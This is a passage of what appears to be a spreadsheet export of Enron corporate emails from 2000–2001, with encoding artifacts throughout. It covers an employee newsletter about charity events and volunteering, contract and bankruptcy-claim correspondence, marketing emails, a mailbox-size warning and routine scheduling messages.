The Museum of Fine Arts and KRTS 92.1 invite you, your co-workers and your=_x000D_
=20_x000D_
friends to a Corporate Partners' event... First Fridays (the professional's=_x000D_
=20_x000D_
happy hour) on Friday, April 6 , 2001  5:30 till 8:30 p.m.  Enjoy the music=_x000D_
=20_x000D_
of the Dylon Robbins Quartet in the Cafe Express of the museum's Audrey Jon=_x000D_
es=20_x000D_
Beck Building 5601 Main Street.  Lite refreshments, Cash Bar, Please come a=_x000D_
s=20_x000D_
you are!  Call India Mittag at (713) 639-7570 for more information_x000D_
_x000D_
First Fridays provides an opportunity to mingle with other professionals,=_x000D_
=20_x000D_
listen to music, and get your monthly dose of culture._x000D_
_x000D_
THIS MONTH_x000D_
_x000D_
Drop your business card to have a chance to win a pair of free tickets to..=_x000D_
._x000D_
_x000D_
"La Vida Loca" - "The  Crazy Life" at The Glassell School of Art Annual=20_x000D_
Benefit and Art Auction on Friday, May 4, 2001.  You will be treated to a=_x000D_
=20_x000D_
dinner buffet followed by dancing in the Cullen Sculpture Garden(price of=_x000D_
=20_x000D_
ticket $125/person)._x000D_
_x000D_
The 5A Gala Benefiting the African American Art Advisory Association and=20_x000D_
honoring Houston artists, Michelle Barnes and Rick Lowe on Saturday, April =_x000D_
7,=20_x000D_
2001 Dinners will be served at several homes around Houston and then guests=_x000D_
=20_x000D_
will come to the Museum of Fine Arts, Houston for dessert and=20_x000D_
entertainment(price of ticket $75/person)._x000D_
_x000D_
_x000D_
_x000D_
2001 Museum of Fine Arts, Houston Corporate Partners Spring Reception, Apri=_x000D_
l=20_x000D_
3!_x000D_
_x000D_
Be a part of the Museum of Fine Arts, Houston 2001 Corporate Partners Sprin=_x000D_
g=20_x000D_
Reception on Tuesday, April 3 at the Law building of the MFA.  Enjoy great=_x000D_
=20_x000D_
food donated by ARIES Restaurant and The Redwood Grill, free drinks, cool=_x000D_
=20_x000D_
art, and good friends.  To attend or with questions call (713) 639-7585._x000D_
_x000D_
_x000D_
Recycle Your Cell Phone!!!_x000D_
Did you forget to bring in your discarded cell phones last week?  If so,=20_x000D_
please send them to Gavin Dillingham at 3AC1526b by April 30th.  By bringin=_x000D_
g=20_x000D_
your old phones, bag phones, batteries, adapters, charging units and other=_x000D_
=20_x000D_
cell=3Dphone related items, you will support Enron's effort to benefit the=_x000D_
=20_x000D_
Houston Chapter of CARE._x000D_
_x000D_
CARE is on the world's largest international relief and development=20_x000D_
organizations with funds going directly to develop sustainable agricultural=_x000D_
=20_x000D_
and economic systems including medical and educational programs in Latin=20_x000D_
America, Asia, Africa, Europe and the Caribbean.  All collected cell phones=_x000D_
=20_x000D_
will be recycled back into use or disposed of in an environmentally=20_x000D_
responsible manner and you will receive an acknowledgement letter from CARE=_x000D_
=20_x000D_
for this donation._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Monday, April 9th_x000D_
Pecan Grove Country Club_x000D_
$125 a player (includes green fees, cart, lunch, dinner &amp; 2 drink tickets)_x000D_
For registration call Donna Clement at (281) 240-8181_x000D_
_x000D_
_x000D_
WalkAmerica, taking place April 29, is the March of Dimes biggest=20_x000D_
fund-raiser. Money raised from the WalkAmerica supports pioneering research=_x000D_
=20_x000D_
and innovative programs that save babies born prematurely or with birth=20_x000D_
defects. Since its beginning in 1970, WalkAmerica has raised more than $1=_x000D_
=20_x000D_
billion to help give babies a fighting chance._x000D_
_x000D_
Every dollar raised will be matched by Enron._x000D_
_x000D_
You can read more about the March of Dimes at www.modimes.org._x000D_
_x000D_
For more information, please contact Kimberly Nelson (ext. 33580) or Gina=_x000D_
=20_x000D_
Taylor (ext. 37681)._x000D_
_x000D_
The Lone Star Boxer Rescue Golf Tournament will be held at Cypresswood Golf=_x000D_
=20_x000D_
Course on Wednesday, April 11 beginning with a Shotgun Start at 1 PM.  All=_x000D_
=20_x000D_
proceeds for the tournament benefits the Lone Star Boxer Rescue group which=_x000D_
=20_x000D_
is an all volunteer orginization who works to provide veterinary treatment=_x000D_
=20_x000D_
and find new, permanent homes for unwanted and abandoned Boxer dogs_x000D_
_x000D_
 - GOLF TOURNEY HOLE SPONSORSHIP FORM.doc_x000D_
 - GOLF TOURNAMENT REGISTRATION FORM.doc_x000D_
_x000D_
Hockey Fans!!!  The Houston Aeros Booster Club End -of-Season Banquet is=20_x000D_
Monday, April 9, 2001 from 6 PM - 10 PM at the Warwick Hotel located=20_x000D_
at 5791 Main Street.  All proceeds benefit "Kids Unlimited Foundation",  an=_x000D_
=20_x000D_
all volunteer organization benefiting  children with cancer and their=20_x000D_
families. =20_x000D_
"Kids"  sponsors family oriented events to bring together everyone affected=_x000D_
=20_x000D_
by these devastating circumstances.  =20_x000D_
_x000D_
Donation_x000D_
Nonmembers:      $70.00  Cocktails: 6pm-7pm_x000D_
Members:              $60.00  Dinner:  7pm-8:30pm_x000D_
Table:                   $750.00  Silent Auction: 6pm-9pm_x000D_
(table seats 8 persons plus player)_x000D_
_x000D_
Beer, wine and soft drinks included in the price._x000D_
_x000D_
For additional information contact Debra Perlingiere @ 37658 or Aeros Boost=_x000D_
er=20_x000D_
Banquet Contact John Shaw @ 281-531-7799, john@cruiselife.com._x000D_
_x000D_
_x000D_
_x000D_
This group of young professionals is a fun, energetic group of young=20_x000D_
professionals in their twenties and thirties working hard to increase the=_x000D_
=20_x000D_
awareness of DePelchin Children's Center among young adults in Houston.  Th=_x000D_
e=20_x000D_
organization hosts social gatherings, helping with various volunteer projec=_x000D_
ts=20_x000D_
and raising funds for DePelchin Children's Center. Please call (713) 802-76=_x000D_
48=20_x000D_
or go to www.depelchin.org/young.html to learn how you can become a member.=_x000D_
=20_x000D_
_x000D_
_x000D_
_x000D_
As a member of Young Friends, you will:_x000D_
receive free admission to social functions_x000D_
have the opportunity to volunteer for fun projects that benefit children wh=_x000D_
o=20_x000D_
are served by DePelchin Children's Center_x000D_
be able to serve on Young Friends' committees_x000D_
receive the Directory of Members as well as DePelchin's quarterly newslette=_x000D_
r,=20_x000D_
Todayhave the satisfaction of supporting one of Houston's most=20_x000D_
well-established charitable organizations._x000D_
receive networking opportunities with other young professionals=20_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Support TEAM ENRON and Jeff Skilling by participating in the MS150 from=20_x000D_
Houston to Austin on April 21st and April 22nd.  All-purpose volunteers are=_x000D_
=20_x000D_
needed to handle various logistical duties including serving meals to the=_x000D_
=20_x000D_
Team, playing music, directing riders to the Enron Tent, setting-up and=20_x000D_
tearing-down, making massage appointments... to name just a few!_x000D_
Can't commit to the whole weekend?  Participate where you can!  Main sites=_x000D_
=20_x000D_
include Bellville (Saturday lunch), LaGrange (overnight stop), Bastrop=20_x000D_
(Sunday lunch) and Austin (the FINISH LINE!).  While everyone will be=20_x000D_
responsible for their own transportation &amp; lodging, our volunteers are=20_x000D_
welcome to camp out with the Team in the Enron Tent in LaGrange.  You may=_x000D_
=20_x000D_
also investigate the possibility of staying at lodging establishments in th=_x000D_
e=20_x000D_
area._x000D_
All volunteers will receive a free Enron Cycling Club tee-shirt, free meals=_x000D_
=20_x000D_
and a priceless experience.  Feel free to bring along your friends and fami=_x000D_
ly=20_x000D_
to volunteer, too!  Take this opportunity to be a hero for our riders who=_x000D_
=20_x000D_
take on this cycling adventure to benefit the National Multiple Sclerosis=_x000D_
=20_x000D_
Society supporting the Houston, Dallas, San Antonio, Austin, and Corpus=20_x000D_
Christi areas.  Please contact Heather Choate via e-mail or at x33278 for=_x000D_
=20_x000D_
more information!=20_x000D_
_x000D_
_x000D_
On Saturday, April 7th, volunteers are needed to work the KRBE Kid's Zone a=_x000D_
nd=20_x000D_
the Ultimate Enron Solar-Powered Anti-Haze Maze at the 104 KRBE / Enron Ear=_x000D_
th=20_x000D_
Day Festival.  As a volunteer, you'll receive a free special-edition=20_x000D_
volunteer tee-shirt, one (1) free ticket to the concert and free lunch!!!  =_x000D_
A=20_x000D_
brief orientation will take place in the Energizer on Tuesday, March 27th a=_x000D_
t=20_x000D_
3:00pm. =20_x000D_
_x000D_
Please call Jessica Nunez at ext. 31918 to reserve your slot!_x000D_
_x000D_
VOLUNTEERS NEEDED FOR 15TH  ANNUAL HOUSTON HOOP-IT-UP MAY 5-6!_x000D_
_x000D_
The best way to get yourself jump-started for a full year of Hoops.  Become=_x000D_
 a=20_x000D_
part of this jammin=01,hoops scene with over 1,200 teams &amp; 4,800 players.  =_x000D_
Join=20_x000D_
us at Greenspoint Mall for a basketball-crazed atmosphere.  Games and speci=_x000D_
al=20_x000D_
events being played simultaneously on 110 courts so the basketballs will be=_x000D_
=20_x000D_
flying HOOP-IT-UP is where you play for FUN.  EVENT BENEFITS THE =01&amp;ESCAPE=_x000D_
=20_x000D_
FAMILY RESOURCE CENTER=018_x000D_
_x000D_
SATURDAY =01)  MAY 5TH 8:00 =01) 6:00 PM_x000D_
SUNDAY =01)  MAY 6TH 8:00 =01) 5:00 PM_x000D_
_x000D_
For more information please call =01&amp;Hoop-It-Up Hotline=018: 713-521-4535 o=_x000D_
r_x000D_
E-Mail: Hoopitup@Texas.Net=20_x000D_
_x000D_
Join the Integrated Solutions Team &amp; PSI Homesavers on April 21 &amp; April 28!_x000D_
Enron is proud to support PSI Homesavers with three crews for their annual=_x000D_
=20_x000D_
spring volunteer project.  More crews can be added so sign up to participat=_x000D_
e=20_x000D_
or include your team!  Responsibilities include being part of a work crew t=_x000D_
o=20_x000D_
complete needed exterior home repairs for low income, predominately elderly=_x000D_
=20_x000D_
homeowners in Houston neighborhoods.  Contact Donnis Traylor at. ext. 55667=_x000D_
=20_x000D_
for more information!_x000D_
_x000D_
_x000D_
Please contact Charla Reese at x35202 if you are a member of a band that=20_x000D_
would interested in playing at an Enron employee event._x000D_
_x000D_
_x000D_
_x000D_
Weight Watchers "At Work" is gearing up for another session.  Cost is $164=_x000D_
=20_x000D_
for 15 weeks ($143 for Weight Watchers "Lifetime Members").  There are 18=_x000D_
=20_x000D_
spaces remaining and they will be filled on a first-come, first-served=20_x000D_
basis.  Reserve your space by e-mailing georgia.fogo@enron.com.  Classes ar=_x000D_
e=20_x000D_
held every Wednesday at 11:45 a.m. beginning April 4.  E-mail confirmations=_x000D_
=20_x000D_
for class participants will begin on Monday, April 2.=20_x000D_
_x000D_
Double click on the icon below to learn more about the new Enron Kids'=20_x000D_
Center. =20_x000D_
_x000D_
_x000D_
_x000D_
Have News to Share?_x000D_
To post news or events in Enron In Action, please e-mail your information t=_x000D_
o=20_x000D_
EIA@enron.com=20_x000D_
no later than 12:00 noon the Thursday prior to the next Monday=01,s mailing=_x000D_
._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 15 May 2000 10:03:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'lew_hay@fpl.com'})</t>
  </si>
  <si>
    <t>Genco</t>
  </si>
  <si>
    <t>Lew, it looks like I have some appointments I can't get out of on the 24th; _x000D_
however, we could be out there by noon on the 25th.  How does that fit?  I _x000D_
did get a call from Mike letting me know that he would be sending over the CA._x000D_
_x000D_
Regards_x000D_
Delainey</t>
  </si>
  <si>
    <t>Thu, 31 May 2001 01:42:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Ode to the Legal Lady's of Swap and a Sempra Energy Credit W/S</t>
  </si>
  <si>
    <t xml:space="preserve">I feel your stock rising already!_x000D_
_x000D_
_x000D_
_x000D_
	Russell Diamond/ENRON@enronXgate_x000D_
	05/31/2001 08:03 AM_x000D_
		 _x000D_
		 To: Tana Jones/HOU/ECT@ECT, Marie Heard/NA/Enron@Enron, Susan _x000D_
Bailey/HOU/ECT@ECT, Stephanie Panus/NA/Enron@Enron_x000D_
		 cc: _x000D_
		 Subject: Ode to the Legal Lady's of Swap and a Sempra Energy Credit W/S_x000D_
_x000D_
Dear Legal Lady's_x000D_
_x000D_
I would like to further reinstate my status of favorite Credit Person, I know _x000D_
as of late my status had been slipping and I must confess I have no one to _x000D_
blame but myself.  I want you to know that after a lot of deep thought and _x000D_
pondering of my potential status downgrade, I have resolved myself to pull _x000D_
from deep inside and work to maintain my status.  Although my mates in credit _x000D_
have provided some strong competition to remove me from favorite credit _x000D_
status, I am here to tell you that I am committed 150% to remain as your _x000D_
favorite credit person!!!!!_x000D_
_x000D_
Yours Truly,_x000D_
Russell_x000D_
_x000D_
_x000D_
Now, that being said, my commitment is demonstrated by the submittance of the _x000D_
Sempra Energy Solutions Credit Worksheet._x000D_
_x000D_
_x000D_
_x000D_
Thanks again,_x000D_
Russell_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 23 May 2001 08:01:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'travis.mccullough@enron.com', 'marty.sunde@enron.com', 'janet.dietrich@enron.com', 'karen.denne@enron.com', 'william.bradford@enron.com', 'jklauber@llgm.com', 'rick.buy@enron.com', 'david.delainey@enron.com', 'elizabeth.sager@enron.com', 'mark.koenig@enron.com', 'susan.mara@enron.com', 'richard.shapiro@enron.com', 'steven.kean@enron.com', 'mike.smith@enron.com', 'mark.haedicke@enron.com', 'dan.leff@enron.com', 'harry.kingerski@enron.com', 'wanda.curry@enron.com', 'david.gorte@enron.com', 'robert.williams@enron.com', 'vicki.sharp@enron.com', 'jeff.dasovich@enron.com', 'james.steffes@enron.com', 'john.lavorato@enron.com', 'mark.palmer@enron.com', 'byoung@llgm.com', 'greg.whalley@enron.com', 'lisa.mellencamp@enron.com'})</t>
  </si>
  <si>
    <t>PX credits &amp; Schedule F in the PG&amp;E bankruptcy</t>
  </si>
  <si>
    <t xml:space="preserve">PG&amp;E filed their Schedule F which displays its nonpriority unsecured claims.  _x000D_
Many of the claims were listed as unknown in amount.  The PX credit amounts _x000D_
were listed as disputed.   Two PX credit amounts were specified in the _x000D_
Schedule F:_x000D_
_x000D_
Enron Energy Marketing      $201,964,905.64_x000D_
Enron Energy Services       $ 19,737,979.97_x000D_
Total disclosed PX credit   $221,702,885.61_x000D_
_x000D_
Note that in the claims that were listed as unknown in amount, none were _x000D_
described as PX Credit in nature. _x000D_
_x000D_
Two points to be made: 1) this information is now public (but on page 5,066 _x000D_
of 17,096 on a CD), along with $53,985,167 in other Enron related claims, and _x000D_
2) our calculation of the PX credit was $392,416,534 at the beginning of May._x000D_
_x000D_
Regards,_x000D_
_x000D_
_x000D_
Michael_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 15 Dec 2000 02:13:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'saceves@att.net'})</t>
  </si>
  <si>
    <t>Re: Final Exam for E220</t>
  </si>
  <si>
    <t>Thank you.  Have a nice holiday._x000D_
_x000D_
Best,_x000D_
Jeff</t>
  </si>
  <si>
    <t>Sat, 19 Aug 2000 02:02:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jobsonline@goemsi.com'})</t>
  </si>
  <si>
    <t>Virtual Office Suite From Jobsonline.com</t>
  </si>
  <si>
    <t>Become a High Flyer with JobsOnline!_x000D_
_x000D_
JobsOnline wants to help you move into the fast lane by giving away an entire _x000D_
Virtual Office. The Internet?s leading job site is giving away a laptop _x000D_
computer, a palm pilot, a cellular phone and a leather briefcase to one lucky _x000D_
person who registers with the site between now and the end of September! When _x000D_
you register with JobsOnline, not only will you be in with a chance to win _x000D_
these fabulous prizes, but you will also have access to their FREE job _x000D_
database._x000D_
_x000D_
http://www.goEMSi.com/l.asp?c=jo&amp;r=a&amp;i=2973303&amp;s=65_x000D_
(If this hyperlink is not completely highlighted, please copy it to your _x000D_
browser.)_x000D_
_x000D_
JobsOnline is one of the Internet's leading sites for employment information _x000D_
and career resources. Search their extensive database of job postings to make _x000D_
your next career move. And use the site?s valuable career resources to assist _x000D_
you in your job search, or to succeed in your current position. Even better, _x000D_
it?s all free._x000D_
_x000D_
Take one minute to register with JobsOnline and you will automatically be _x000D_
entered in our Virtual Office Giveaway._x000D_
_x000D_
http://www.goEMSi.com/l.asp?c=jo&amp;r=a&amp;i=2973303&amp;s=65_x000D_
(If this hyperlink is not completely highlighted, please copy it to your _x000D_
browser.)_x000D_
_x000D_
You have received this email because you or someone using your email address _x000D_
agreed to receive special offers and promotions from Enterprise Marketing _x000D_
Solutions and its Web site partners._x000D_
_x000D_
If you wish to be excluded from future offers please click on_x000D_
mailto:customerserviceJOBS@goEMSi.com and type "Unsubscribe" in the subject _x000D_
line and click ?send?._x000D_
_x000D_
As always, if you have questions or comments for us, please send them to_x000D_
mailto:customerserviceJOBS@goEMSi.com_x000D_
_x000D_
If you wish to know more about our privacy policies please go to_x000D_
http://www.goEMSi.com/privst.htm</t>
  </si>
  <si>
    <t>Thu, 30 Mar 2000 03:33:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'charlotte.hawkins@enron.com'})</t>
  </si>
  <si>
    <t>April, Aspect Volume @ Texas City</t>
  </si>
  <si>
    <t>For April 1, 2000:_x000D_
_x000D_
Cross Media                         989815 =    903 MMBtu_x000D_
TNCT                                      989816  = 5878  MMBtu_x000D_
_x000D_
Any questions, just call._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Charlotte Hawkins</t>
  </si>
  <si>
    <t>Mon, 22 Jan 2001 10:25:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'fgent@thermoecotek.com', 'hedsf@aol.com', 'eric.eisenman@gen.pge.com', 'william_carlson@wastemanagement.com', 'al.jensen@nrgenergy.com', 'edstrome@epenergy.com', 'jfeldman@mofo.com', 'billw@calpine.com', 'steve_ponder@fpl.com', 'rjhickok@duke-energy.com', 'cody.carter@williams.com', 'emaddox@seawestwindpower.com', 'fernley.doug@epenergy.com', 'paul_wood@ogden-energy.com', 'sangorgon@aol.com', 'pete@calwind.com', 'dfrank@seawestwindpower.com', 'jweisgall@aol.com', 'eileenk@calpine.com', 'curt.hatton@gen.pge.com', 'alex.sugaoka@uaecorp.com', 'joer@calpine.com', 'bfpjv@c-zone.net', 'mcmannes@aol.com', 'ain@worldnet.att.net', 'kent.palmerton@williams.com', 'siliff@riobravo-gm.com', 'elozowicki@sjo.coudert.com', 'kellyl@enxco.com', 'lale@dynegy.com', 'mark_j_smith@fpl.com', 'smara@enron.com', 'sn2621@aol.com', 'john_h_stout@reliantenergy.com', 'kristy_rumbaugh@ogden-energy.com', 'gtbl@dynegy.com', 'dean_gosselin@fpl.com', 'tim.loposer@williams.com', 'ted_cortopassi@ogden-energy.com', 'twetzel@thermoecotek.com', 'wscobee@caithnessenergy.com', 'harlans@epenergy.com', 'david.parquet@enron.com', 'paula_soos@ogden-energy.com', 'bob.gates@enron.com', 'jeff.dasovich@enron.com', 'bbuchynsky@aol.com', 'elliottsa@earthlink.net', 'charles.linthicum@powersrc.com', 'kfickett@usgen.com', 'rescalante@riobravo-gm.com', 'lucian_fox@ogden-energy.com', 'jack.hawks@gen.pge.com', 'bcragg@gmssr.com', 'fmisseldine@caithnessenergy.com', 'dscholl@purenergyllc.com', 'dnelsen@gwfpower.com', 'tom_hartman@fpl.com', 'freesrj@apci.com', 'ccastillo@riobravo-gm.com', 'hellertj@apci.com', 'rllamkin@seiworldwide.com', 'efeo@milbank.com', 'sdl@calwind.com', 'bellery@spi-ind.com', 'bill.barnes@lgeenergy.com', 'stephanie-newell@reliantenergy.com', 'roger.pelote@williams.com', 'dkk@eslawfirm.com', 'jackp@calpine.com', 'kbssac@aol.com', 'agilford@wbcounsel.com', 'nam.nguyen@powersrc.com', 'wkawamoto@wm.com', 'wfhall2@duke-energy.com', 'khoffman@caithnessenergy.com', 'rich_dyer@ogden-energy.com', 'frank.derosa@gen.pge.com', 'marty_mcfadden@ogden-energy.com', 'jsimon@epsa.org', 'ed.tomeo@uaecorp.com', 'rboyd@enron.com', 'cabaker@duke-energy.com', 'armen.arslanian@gecapital.com', 'difellman@energy-law-group.com', 'curtis_l_kebler@reliantenergy.com'})</t>
  </si>
  <si>
    <t>Conference Call Tuesday - Updates</t>
  </si>
  <si>
    <t>IEP will host a conference call on Tuesday, January 23rd at 5:00 pm Pacific_x000D_
Standard Time.  Please note the call-in number and code._x000D_
_x000D_
Call-In#:  888-476-3757_x000D_
Part. Code: 111756_x000D_
_x000D_
_x000D_
_x000D_
Carol Hudson_x000D_
Independent Energy Producers Assn._x000D_
1112 I Street, Suite 380_x000D_
Sacramento, CA 95814_x000D_
PH: 916-448-9499_x000D_
FX: 916-448-0182_x000D_
chudson@iepa.com</t>
  </si>
  <si>
    <t>Tue, 9 Jan 2001 00:23:00 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: FW: Enfolio Contract with CPS</t>
  </si>
  <si>
    <t>Under FINANCIAL MATTERS: BILLING, INVOICE DATE, CHARGES AND PAYMENT in_x000D_
Appendix 1, I propose the following revised wording since we are not able to_x000D_
provide a purchase order number at this time:_x000D_
_x000D_
"Invoices for payments and correspondence for this Agreement must reference_x000D_
Buyer's Purchase Order Number if such has been provided to Seller prior to_x000D_
the first (1st) Business Day following the month of Gas deliveries.  If the_x000D_
Purchase Order Number has been timely provided to Seller, invoices which do_x000D_
not reference Buyer's Purchase Order Number will be returned unpaid.  All_x000D_
invoices shall include any supporting documentation necessary to verify the_x000D_
charges billed."_x000D_
_x000D_
-----Original Message-----_x000D_
From: Pfister, Christian W._x000D_
Sent: Friday, December 15, 2000 5:49 PM_x000D_
To: 'Dan.J.Hyvl@enron.com'_x000D_
Subject: FW: FW: Enfolio Contract with CPS_x000D_
_x000D_
_x000D_
Mr. Hyvl,_x000D_
_x000D_
There was one change that you did not make that I requested.  It was_x000D_
difficult to tell since only a single word was bolded._x000D_
_x000D_
APPENDIX "1"  FINANCIAL MATTERS  BILLING, INVOICE DATE, CHARGES AND PAYMENT_x000D_
_x000D_
"Buyer shall remit any amounts due on the 25th day of the Month in which_x000D_
Seller's statement was received.  If the due date for any payment to be made_x000D_
under this Agreement is not a Customer's Business Day, the due date for such_x000D_
payment shall be the following Customer's Business Day."_x000D_
_x000D_
There are very few instances where our Business Day would be different from_x000D_
your business day.  However, as an example, the day after Thanksgiving is a_x000D_
CPS holiday.  This year, we had a gas payment due on that date which we sent_x000D_
on the following Monday.  This is probably the only holiday CPS has that_x000D_
your company may not have._x000D_
_x000D_
-----Original Message-----_x000D_
From: Dan.J.Hyvl@enron.com [mailto:Dan.J.Hyvl@enron.com]_x000D_
Sent: Friday, December 15, 2000 4:57 PM_x000D_
To: CWPfister@cps-satx.com_x000D_
Subject: RE: FW: Enfolio Contract with CPS_x000D_
_x000D_
_x000D_
_x000D_
Christian,_x000D_
     Attached is the modified contract with the changes you requested._x000D_
Please print off 2 originals and have them signed.  Please fill in the_x000D_
purchase order number information on the invoices section of Exhibit A.  If_x000D_
the number is not available, them please delete the information requiring_x000D_
the number from the billing and payment provision.  Forward the signed_x000D_
copies to me or Janet Wallis and we will proceed with execution by ENA._x000D_
(See attached file: CITYPublicServiceSanAntonio.doc)_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
                    "Pfister,_x000D_
_x000D_
                    Christian W."         To:     "'Dan.J.Hyvl@enron.com'"_x000D_
_x000D_
                    &lt;CWPfister@cps        &lt;Dan.J.Hyvl@enron.com&gt;_x000D_
_x000D_
                    -satx.com&gt;            cc:_x000D_
_x000D_
                                          Subject:     RE: FW: Enfolio_x000D_
Contract with CPS_x000D_
                    12/15/2000_x000D_
_x000D_
                    04:16 PM_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Unfortunately, we don't have a purchase order issued yet so I can't give_x000D_
you_x000D_
a number.  I know that would make it easier for you guys, but I don't think_x000D_
we can issue one until right before the first gas purchase.  First, a_x000D_
purchase requisition needs to be issued.  Then, a purchase order will be_x000D_
released following approvals by the various individuals authorized to sign_x000D_
off on them._x000D_
_x000D_
-----Original Message-----_x000D_
From: Dan.J.Hyvl@enron.com [mailto:Dan.J.Hyvl@enron.com]_x000D_
Sent: Friday, December 15, 2000 4:13 PM_x000D_
To: CWPfister@cps-satx.com_x000D_
Cc: Janet.H.Wallis@enron.com_x000D_
Subject: RE: FW: Enfolio Contract with CPS_x000D_
_x000D_
_x000D_
_x000D_
Christian,_x000D_
     If the purchase order number will be the same for all deals under the_x000D_
contract, can you give me the number so that I can include it as a part of_x000D_
your address for Invoices._x000D_
_x000D_
_x000D_
_x000D_
 - CITYPublicServiceSanAntonio.doc</t>
  </si>
  <si>
    <t>Risk management portal update</t>
  </si>
  <si>
    <t xml:space="preserve">http://search.netscape.com/cgi-bin/search?cp=nsiwidsrc&amp;search=reverse+search&amp;x_x000D_
=36&amp;y=1_x000D_
---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 04/09/2001 _x000D_
02:16 PM ---------------------------_x000D_
_x000D_
_x000D_
ERisk &lt;ERisk@email.eRisks.com&gt; on 04/05/2001 10:41:53 AM_x000D_
Please respond to &lt;info@erisk.com&gt;_x000D_
To: vkamins@ect.enron.com_x000D_
cc:  _x000D_
Subject: Risk management portal update_x000D_
_x000D_
_x000D_
We are sending you this email because you requested more information_x000D_
from us after hearing us speak at a conference, stopping by our_x000D_
booth in an exhibit hall, or indicating to one of our partners that_x000D_
you would like to receive risk management-related emails._x000D_
_x000D_
________________________________________________________________x000D_
_x000D_
We redesigned and relaunched our free risk management portal_x000D_
http://www.erisk.com_x000D_
Here are some of the exciting new features you can explore on our_x000D_
redesigned site:_x000D_
_x000D_
RISK NEWS AND ANALYSIS_x000D_
http://email.eRisks.com/cgi-bin10/flo?y=eHbE0CBQRR0EFL0Bia0Al_x000D_
ERisk's experienced editorial and journalistic staff now offer_x000D_
insightful Weekly News Analysis and original Feature Articles in_x000D_
addition to risk-relevant Daily News stories._x000D_
New: A second look at the usefulness of RAROC in our feature_x000D_
"Between RAROC and a Hard Place"_x000D_
http://email.eRisks.com/cgi-bin10/flo?y=eHbE0CBQRR0EFL0B4W0Ai_x000D_
_x000D_
_x000D_
RISK COMMUNITY_x000D_
http://email.eRisks.com/cgi-bin10/flo?y=eHbE0CBQRR0EFL0BWh0Aa_x000D_
We are continuing provide free online educational and networking_x000D_
opportunities through our iConference series._x000D_
The Job Listings and Events Calendar have been relocated to the_x000D_
"News" section of the site._x000D_
New: Register for upcoming iConference on Economic Capital_x000D_
Attribution on April 11_x000D_
http://email.eRisks.com/cgi-bin10/flo?y=eHbE0CBQRR0EFL0BSA0Ar_x000D_
_x000D_
_x000D_
RISK REFERENCE &amp; EDUCATION_x000D_
http://email.eRisks.com/cgi-bin10/flo?y=eHbE0CBQRR0EFL0Bic0An_x000D_
Check out our new, unique Risk Jigsaw tutorial, Research Archive,_x000D_
and Hot Topics along with the Case Studies, Risk Links, and ERisk_x000D_
Encyclopedia you knew and loved on our old site._x000D_
New: Take an in-depth look at Credit Risk Management in the new Risk_x000D_
Jigsaw piece_x000D_
http://email.eRisks.com/cgi-bin10/flo?y=eHbE0CBQRR0EFL0BWf0AY_x000D_
_x000D_
_x000D_
ERISK PRODUCTS &amp; SERVICES_x000D_
http://email.eRisks.com/cgi-bin10/flo?y=eHbE0CBQRR0EFL0Bif0Aq_x000D_
Did you think ERisk was just a website?  Find out about our_x000D_
Consulting, Analytics, and Risk Transfer Advisory Services here._x000D_
New: Get an overview of our products and services at_x000D_
http://email.eRisks.com/cgi-bin10/flo?y=eHbE0CBQRR0EFL0B5C0AP_x000D_
_x000D_
_x000D_
Visit our homepage to take our site tour and discover the new_x000D_
ERisk.com today.  Then register (for free) at_x000D_
http://email.eRisks.com/cgi-bin10/flo?y=eHbE0CBQRR0EFL0BXt0An_x000D_
to access our content and receive weekly risk news by email!_x000D_
_x000D_
If you have any questions or comments about our site, please_x000D_
contact info@erisk.com._x000D_
_x000D_
_x000D_
Your Friends at ERisk.com_x000D_
_x000D_
****************************************************_x000D_
To unsubscribe, please forward this email to_x000D_
unsubscribe_contacts@email.eRisks.com_x000D_
To subscribe to our regular email newsletter and receive_x000D_
iConference invitations, register at_x000D_
http://email.eRisks.com/cgi-bin10/flo?y=eHbE0CBQRR0EFL0BXt0An_x000D_
</t>
  </si>
  <si>
    <t>Sun, 21 Oct 2001 00:00:22 -0700 (PDT)</t>
  </si>
  <si>
    <t>This warning is sent automatically to inform you that your mailbox is approaching the maximum size limit._x000D_
Your mailbox size is currently 81193 KB._x000D_
_x000D_
Mailbox size limits:_x000D_
_x000D_
	When your mailbox reaches 75000 KB you will receive this message.To check the size of your mailbox: _x000D_
_x000D_
  Right-click the mailbox (Outlook Today), _x000D_
  Select Properties and click the Folder Size button. _x000D_
  This method can be used on individual folders as well. _x000D_
_x000D_
To make more space available, delete any items that are no longer needed such as Sent Items and Journal entries.  _x000D_
_x000D_
You must empty the Deleted Items folder after deleting items or the space will not be freed. _x000D_
_x000D_
To turn Journaling off, _x000D_
 click Tools | Options | Journaling Options and de-select all items. _x000D_
_x000D_
See client Help for more information.</t>
  </si>
  <si>
    <t>Mon, 1 Oct 2001 14:43:23 -0700 (PDT)</t>
  </si>
  <si>
    <t>Adrianne:_x000D_
 _x000D_
The topic will be "Storage".  Would you please confirm that it is on Thursday, October 4, 2001.  I'm out of the office tomorrow so I will have to put a presentation together on Wednesday and Thursday._x000D_
 _x000D_
    Thanks,  Jim_x000D_
_x000D_
-----Original Message-----_x000D_
From: Engler, Adrianne _x000D_
Sent: Monday, October 01, 2001 4:33 PM_x000D_
To: Schwieger, Jim_x000D_
Subject: Reminder_x000D_
_x000D_
_x000D_
Good Afternoon Jim - _x000D_
 _x000D_
Just a friendly reminder that this Thursday your are scheduled to speak to the Trading Track folks from 4-6pm.  _x000D_
 _x000D_
What do you anticipate your topic to be?_x000D_
 _x000D_
Please let me kow if you have any questions._x000D_
 _x000D_
Kind regards, _x000D_
 _x000D_
Adrianne Engler_x000D_
x57302</t>
